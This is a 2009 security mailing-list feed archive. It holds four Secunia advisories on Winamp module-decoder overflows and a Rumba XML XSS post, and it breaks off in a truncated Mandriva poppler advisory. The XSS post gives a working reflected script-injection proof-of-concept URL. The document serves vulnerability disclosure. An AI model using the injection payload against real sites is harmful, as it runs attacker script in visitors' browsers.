	<link rel="alternate" type="text/html" href="http://old.nabble.com/SEC-Consult-SA-20091217-0-%3A%3A-Authentication-bypass-and-file-manipulation-in-Sitecore-Staging-Module-tp26829953p26829953.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26833986</id>
	<title>Rumba XML XSS vulnerability</title>
	<published>2009-12-17T04:02:16Z</published>
	<updated>2009-12-17T04:02:16Z</updated>
	<author>
		<name>hadikiamarsi</name>
	</author>
	<content type="html">###########################################
&lt;br&gt;#
&lt;br&gt;# Script Name : Rumba XML ( All Version )
&lt;br&gt;#
&lt;br&gt;# Bug Type : XSS vulnerability
&lt;br&gt;#
&lt;br&gt;# Found by : Hadi Kiamarsi
&lt;br&gt;#
&lt;br&gt;# Contact : hadikiamarsi [at] hotmail.com
&lt;br&gt;#
&lt;br&gt;# Download : &lt;a href=&quot;http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip&lt;/a&gt;&lt;br&gt;#
&lt;br&gt;&lt;br&gt;###########################################
&lt;br&gt;&lt;br&gt;PoC :
&lt;br&gt;&lt;br&gt;http://[target]/[path]/index.php/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('Hadi Kiamarsi')&amp;lt;/script&amp;gt;
&lt;br&gt;&lt;br&gt;example :
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.example.com/index.php/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.example.com/index.php/&lt;/a&gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('Hadi Kiamarsi')&amp;lt;/script&amp;gt;
&lt;br&gt;&lt;br&gt;local Example :
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://localhost/index.php/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://localhost/index.php/&lt;/a&gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('Hadi Kiamarsi')&amp;lt;/script&amp;gt;
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Rumba-XML-XSS-vulnerability-tp26833986p26833986.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26829607</id>
	<title>Secunia Research: Winamp Impulse Tracker Instrument Parsing Buffer Overflows</title>
	<published>2009-12-17T00:49:40Z</published>
	<updated>2009-12-17T00:49:40Z</updated>
	<author>
		<name>Secunia Research-2</name>
	</author>
	<content type="html">====================================================================== 
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Secunia Research 17/12/2009
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; - Winamp Impulse Tracker Instrument Parsing Buffer Overflows -
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;Table of Contents
&lt;br&gt;&lt;br&gt;Affected Software....................................................1
&lt;br&gt;Severity.............................................................2
&lt;br&gt;Vendor's Description of Software.....................................3
&lt;br&gt;Description of Vulnerability.........................................4
&lt;br&gt;Solution.............................................................5
&lt;br&gt;Time Table...........................................................6
&lt;br&gt;Credits..............................................................7
&lt;br&gt;References...........................................................8
&lt;br&gt;About Secunia........................................................9
&lt;br&gt;Verification........................................................10
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;1) Affected Software 
&lt;br&gt;&lt;br&gt;* Winamp 5.56 Media Player
&lt;br&gt;&lt;br&gt;NOTE: Other versions may also be affected.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;2) Severity 
&lt;br&gt;&lt;br&gt;Rating: Highly critical
&lt;br&gt;Impact: System access
&lt;br&gt;Where: &amp;nbsp;From remote
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;3) Vendor's Description of Software 
&lt;br&gt;&lt;br&gt;&amp;quot;It is more than just a player. It's your window to the multimedia
&lt;br&gt;world. From MP3s to streaming video, Winamp is the one place you go to
&lt;br&gt;feed your audio/video habit.&amp;quot;.
&lt;br&gt;&lt;br&gt;Product Link:
&lt;br&gt;&lt;a href=&quot;http://www.winamp.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.winamp.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;4) Description of Vulnerability
&lt;br&gt;&lt;br&gt;Secunia Research has discovered three vulnerabilities in Winamp, which
&lt;br&gt;can be exploited by malicious people to compromise a user's system.
&lt;br&gt;&lt;br&gt;The vulnerabilities are caused by boundary errors in the Module 
&lt;br&gt;Decoder Plug-in (IN_MOD.DLL) when parsing instrument definitions and 
&lt;br&gt;can be exploited to cause heap-based buffer overflows via a specially 
&lt;br&gt;crafted Impulse Tracker file.
&lt;br&gt;&lt;br&gt;Successful exploitation may allow execution of arbitrary code.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;5) Solution 
&lt;br&gt;&lt;br&gt;Update to version 5.57.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;6) Time Table 
&lt;br&gt;&lt;br&gt;03/12/2009 - Vendor notified.
&lt;br&gt;03/12/2009 - Vendor response.
&lt;br&gt;17/12/2009 - Public disclosure.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;7) Credits 
&lt;br&gt;&lt;br&gt;Discovered by Dyon Balding, Secunia Research.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;8) References
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned 
&lt;br&gt;CVE-2009-3995 for the vulnerability.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;9) About Secunia
&lt;br&gt;&lt;br&gt;Secunia offers vulnerability management solutions to corporate
&lt;br&gt;customers with verified and reliable vulnerability intelligence
&lt;br&gt;relevant to their specific system configuration:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/business_solutions/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/business_solutions/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia also provides a publicly accessible and comprehensive advisory
&lt;br&gt;database as a service to the security community and private 
&lt;br&gt;individuals, who are interested in or concerned about IT-security.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia believes that it is important to support the community and to
&lt;br&gt;do active vulnerability research in order to aid improving the 
&lt;br&gt;security and reliability of software in general:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia regularly hires new skilled team members. Check the URL below
&lt;br&gt;to see currently vacant positions:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/corporate/jobs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/corporate/jobs/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia offers a FREE mailing list called Secunia Security Advisories:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/mailing_lists/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/mailing_lists/&lt;/a&gt;&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;10) Verification 
&lt;br&gt;&lt;br&gt;Please verify this advisory by visiting the Secunia website:
&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/2009-52/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/2009-52/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Complete list of vulnerability reports published by Secunia Research:
&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;======================================================================
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Secunia-Research%3A-Winamp-Impulse-Tracker-Instrument-Parsing-Buffer-Overflows-tp26829607p26829607.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26829900</id>
	<title>Secunia Research: Winamp Impulse Tracker Sample Parsing Buffer Overflow</title>
	<published>2009-12-17T00:49:34Z</published>
	<updated>2009-12-17T00:49:34Z</updated>
	<author>
		<name>Secunia Research-2</name>
	</author>
	<content type="html">====================================================================== 
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Secunia Research 17/12/2009
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; - Winamp Impulse Tracker Sample Parsing Buffer Overflow -
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;Table of Contents
&lt;br&gt;&lt;br&gt;Affected Software....................................................1
&lt;br&gt;Severity.............................................................2
&lt;br&gt;Vendor's Description of Software.....................................3
&lt;br&gt;Description of Vulnerability.........................................4
&lt;br&gt;Solution.............................................................5
&lt;br&gt;Time Table...........................................................6
&lt;br&gt;Credits..............................................................7
&lt;br&gt;References...........................................................8
&lt;br&gt;About Secunia........................................................9
&lt;br&gt;Verification........................................................10
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;1) Affected Software 
&lt;br&gt;&lt;br&gt;* Winamp 5.56 Media Player
&lt;br&gt;&lt;br&gt;NOTE: Prior versions may also be affected.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;2) Severity 
&lt;br&gt;&lt;br&gt;Rating: Highly critical
&lt;br&gt;Impact: System access
&lt;br&gt;Where: &amp;nbsp;From remote
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;3) Vendor's Description of Software 
&lt;br&gt;&lt;br&gt;&amp;quot;It is more than just a player. It's your window to the multimedia
&lt;br&gt;world. From MP3s to streaming video, Winamp is the one place you go to
&lt;br&gt;feed your audio/video habit.&amp;quot;.
&lt;br&gt;&lt;br&gt;Product Link:
&lt;br&gt;&lt;a href=&quot;http://www.winamp.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.winamp.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;4) Description of Vulnerability
&lt;br&gt;&lt;br&gt;Secunia Research has discovered a vulnerability in Winamp, which can
&lt;br&gt;be exploited by malicious people to compromise a user's system.
&lt;br&gt;&lt;br&gt;The vulnerability is caused by a boundary error in the Module Decoder
&lt;br&gt;Plug-in (IN_MOD.DLL) when parsing samples and can be exploited to 
&lt;br&gt;cause a heap-based buffer overflow via a specially crafted Impulse 
&lt;br&gt;Tracker file.
&lt;br&gt;&lt;br&gt;Successful exploitation may allow execution of arbitrary code.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;5) Solution 
&lt;br&gt;&lt;br&gt;Update to version 5.57.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;6) Time Table 
&lt;br&gt;&lt;br&gt;03/12/2009 - Vendor notified.
&lt;br&gt;03/12/2009 - Vendor response.
&lt;br&gt;17/12/2009 - Public disclosure.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;7) Credits 
&lt;br&gt;&lt;br&gt;Discovered by Dyon Balding, Secunia Research.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;8) References
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned 
&lt;br&gt;CVE-2009-3995 for the vulnerability.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;9) About Secunia
&lt;br&gt;&lt;br&gt;Secunia offers vulnerability management solutions to corporate
&lt;br&gt;customers with verified and reliable vulnerability intelligence
&lt;br&gt;relevant to their specific system configuration:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/business_solutions/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/business_solutions/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia also provides a publicly accessible and comprehensive advisory
&lt;br&gt;database as a service to the security community and private 
&lt;br&gt;individuals, who are interested in or concerned about IT-security.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia believes that it is important to support the community and to
&lt;br&gt;do active vulnerability research in order to aid improving the 
&lt;br&gt;security and reliability of software in general:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia regularly hires new skilled team members. Check the URL below
&lt;br&gt;to see currently vacant positions:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/corporate/jobs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/corporate/jobs/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia offers a FREE mailing list called Secunia Security Advisories:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/mailing_lists/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/mailing_lists/&lt;/a&gt;&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;10) Verification 
&lt;br&gt;&lt;br&gt;Please verify this advisory by visiting the Secunia website:
&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/2009-53/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/2009-53/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Complete list of vulnerability reports published by Secunia Research:
&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;======================================================================
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Secunia-Research%3A-Winamp-Impulse-Tracker-Sample-Parsing-Buffer-Overflow-tp26829900p26829900.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26829726</id>
	<title>Secunia Research: Winamp Ultratracker File Parsing Buffer Overflow</title>
	<published>2009-12-17T00:49:27Z</published>
	<updated>2009-12-17T00:49:27Z</updated>
	<author>
		<name>Secunia Research-2</name>
	</author>
	<content type="html">====================================================================== 
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Secunia Research 17/12/2009
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; - Winamp Ultratracker File Parsing Buffer Overflow -
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;Table of Contents
&lt;br&gt;&lt;br&gt;Affected Software....................................................1
&lt;br&gt;Severity.............................................................2
&lt;br&gt;Vendor's Description of Software.....................................3
&lt;br&gt;Description of Vulnerability.........................................4
&lt;br&gt;Solution.............................................................5
&lt;br&gt;Time Table...........................................................6
&lt;br&gt;Credits..............................................................7
&lt;br&gt;References...........................................................8
&lt;br&gt;About Secunia........................................................9
&lt;br&gt;Verification........................................................10
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;1) Affected Software 
&lt;br&gt;&lt;br&gt;* Winamp 5.56 Media Player
&lt;br&gt;&lt;br&gt;NOTE: Prior versions may also be affected.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;2) Severity 
&lt;br&gt;&lt;br&gt;Rating: Highly critical
&lt;br&gt;Impact: System access
&lt;br&gt;Where: &amp;nbsp;From remote
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;3) Vendor's Description of Software 
&lt;br&gt;&lt;br&gt;&amp;quot;It is more than just a player. It's your window to the multimedia
&lt;br&gt;world. From MP3s to streaming video, Winamp is the one place you go to
&lt;br&gt;feed your audio/video habit.&amp;quot;.
&lt;br&gt;&lt;br&gt;Product Link:
&lt;br&gt;&lt;a href=&quot;http://www.winamp.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.winamp.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;4) Description of Vulnerability
&lt;br&gt;&lt;br&gt;Secunia Research has discovered a vulnerability in Winamp, which can
&lt;br&gt;be exploited by malicious people to compromise a user's system.
&lt;br&gt;&lt;br&gt;The vulnerability is caused by an error in the Module Decoder Plug-in
&lt;br&gt;(IN_MOD.DLL) when parsing Ultratracker files and can be exploited to 
&lt;br&gt;cause a heap-based buffer overflow.
&lt;br&gt;&lt;br&gt;Successful exploitation may allow execution of arbitrary code.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;5) Solution 
&lt;br&gt;&lt;br&gt;Update to version 5.57.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;6) Time Table 
&lt;br&gt;&lt;br&gt;07/12/2009 - Vendor notified.
&lt;br&gt;07/12/2009 - Vendor response.
&lt;br&gt;17/12/2009 - Public disclosure.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;7) Credits 
&lt;br&gt;&lt;br&gt;Discovered by Dyon Balding, Secunia Research.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;8) References
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned 
&lt;br&gt;CVE-2009-3996 for the vulnerability.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;9) About Secunia
&lt;br&gt;&lt;br&gt;Secunia offers vulnerability management solutions to corporate
&lt;br&gt;customers with verified and reliable vulnerability intelligence
&lt;br&gt;relevant to their specific system configuration:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/business_solutions/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/business_solutions/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia also provides a publicly accessible and comprehensive advisory
&lt;br&gt;database as a service to the security community and private 
&lt;br&gt;individuals, who are interested in or concerned about IT-security.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia believes that it is important to support the community and to
&lt;br&gt;do active vulnerability research in order to aid improving the 
&lt;br&gt;security and reliability of software in general:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia regularly hires new skilled team members. Check the URL below
&lt;br&gt;to see currently vacant positions:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/corporate/jobs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/corporate/jobs/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia offers a FREE mailing list called Secunia Security Advisories:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/mailing_lists/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/mailing_lists/&lt;/a&gt;&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;10) Verification 
&lt;br&gt;&lt;br&gt;Please verify this advisory by visiting the Secunia website:
&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/2009-56/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/2009-56/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Complete list of vulnerability reports published by Secunia Research:
&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;======================================================================
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Secunia-Research%3A-Winamp-Ultratracker-File-Parsing-Buffer-Overflow-tp26829726p26829726.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26830375</id>
	<title>Secunia Research: Winamp Oktalyzer Parsing Integer Overflow Vulnerability</title>
	<published>2009-12-17T00:49:20Z</published>
	<updated>2009-12-17T00:49:20Z</updated>
	<author>
		<name>Secunia Research-2</name>
	</author>
	<content type="html">====================================================================== 
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Secunia Research 17/12/2009
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Winamp Oktalyzer Parsing Integer Overflow Vulnerability -
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;Table of Contents
&lt;br&gt;&lt;br&gt;Affected Software....................................................1
&lt;br&gt;Severity.............................................................2
&lt;br&gt;Vendor's Description of Software.....................................3
&lt;br&gt;Description of Vulnerability.........................................4
&lt;br&gt;Solution.............................................................5
&lt;br&gt;Time Table...........................................................6
&lt;br&gt;Credits..............................................................7
&lt;br&gt;References...........................................................8
&lt;br&gt;About Secunia........................................................9
&lt;br&gt;Verification........................................................10
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;1) Affected Software 
&lt;br&gt;&lt;br&gt;* Winamp 5.56 Media Player
&lt;br&gt;&lt;br&gt;NOTE: Prior versions may also be affected.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;2) Severity 
&lt;br&gt;&lt;br&gt;Rating: Highly critical
&lt;br&gt;Impact: System access
&lt;br&gt;Where: &amp;nbsp;From remote
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;3) Vendor's Description of Software 
&lt;br&gt;&lt;br&gt;&amp;quot;It is more than just a player. It's your window to the multimedia
&lt;br&gt;world. From MP3s to streaming video, Winamp is the one place you go to
&lt;br&gt;feed your audio/video habit.&amp;quot;.
&lt;br&gt;&lt;br&gt;Product Link:
&lt;br&gt;&lt;a href=&quot;http://www.winamp.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.winamp.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;4) Description of Vulnerability
&lt;br&gt;&lt;br&gt;Secunia Research has discovered a vulnerability in Winamp, which can
&lt;br&gt;be exploited by malicious people to compromise a user's system.
&lt;br&gt;&lt;br&gt;The vulnerability is caused by an integer overflow error in the 
&lt;br&gt;Module Decoder Plug-in (IN_MOD.DLL) when parsing Oktalyzer files and
&lt;br&gt;can be exploited to cause a heap-based buffer overflow.
&lt;br&gt;&lt;br&gt;Successful exploitation may allow execution of arbitrary code.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;5) Solution 
&lt;br&gt;&lt;br&gt;Update to version 5.57.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;6) Time Table 
&lt;br&gt;&lt;br&gt;07/12/2009 - Vendor notified.
&lt;br&gt;07/12/2009 - Vendor response.
&lt;br&gt;17/12/2009 - Public disclosure.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;7) Credits 
&lt;br&gt;&lt;br&gt;Discovered by Dyon Balding, Secunia Research.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;8) References
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned 
&lt;br&gt;CVE-2009-3997 for the vulnerability.
&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;9) About Secunia
&lt;br&gt;&lt;br&gt;Secunia offers vulnerability management solutions to corporate
&lt;br&gt;customers with verified and reliable vulnerability intelligence
&lt;br&gt;relevant to their specific system configuration:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/business_solutions/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/business_solutions/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia also provides a publicly accessible and comprehensive advisory
&lt;br&gt;database as a service to the security community and private 
&lt;br&gt;individuals, who are interested in or concerned about IT-security.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia believes that it is important to support the community and to
&lt;br&gt;do active vulnerability research in order to aid improving the 
&lt;br&gt;security and reliability of software in general:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia regularly hires new skilled team members. Check the URL below
&lt;br&gt;to see currently vacant positions:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/corporate/jobs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/corporate/jobs/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Secunia offers a FREE mailing list called Secunia Security Advisories:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://secunia.com/advisories/mailing_lists/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/advisories/mailing_lists/&lt;/a&gt;&lt;br&gt;&lt;br&gt;====================================================================== 
&lt;br&gt;10) Verification 
&lt;br&gt;&lt;br&gt;Please verify this advisory by visiting the Secunia website:
&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/2009-57/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/2009-57/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Complete list of vulnerability reports published by Secunia Research:
&lt;br&gt;&lt;a href=&quot;http://secunia.com/secunia_research/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://secunia.com/secunia_research/&lt;/a&gt;&lt;br&gt;&lt;br&gt;======================================================================
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Secunia-Research%3A-Winamp-Oktalyzer-Parsing-Integer-Overflow-Vulnerability-tp26830375p26830375.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26829657</id>
	<title>[ MDVSA-2009:334 ] poppler</title>
	<published>2009-12-16T16:51:01Z</published>
	<updated>2009-12-16T16:51:01Z</updated>
	<author>
		<name>security-22</name>
	</author>
	<content type="html">&lt;br&gt;-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Mandriva Linux Security Advisory &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; MDVSA-2009:334
&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://www.mandriva.com/security/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.mandriva.com/security/&lt;/a&gt;&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Package : poppler
&lt;br&gt;&amp;nbsp;Date &amp;nbsp; &amp;nbsp;: January 1, 1970
&lt;br&gt;&amp;nbsp;Affected: Corporate 4.0
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;Problem Description:
&lt;br&gt;&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;&amp;nbsp;References:
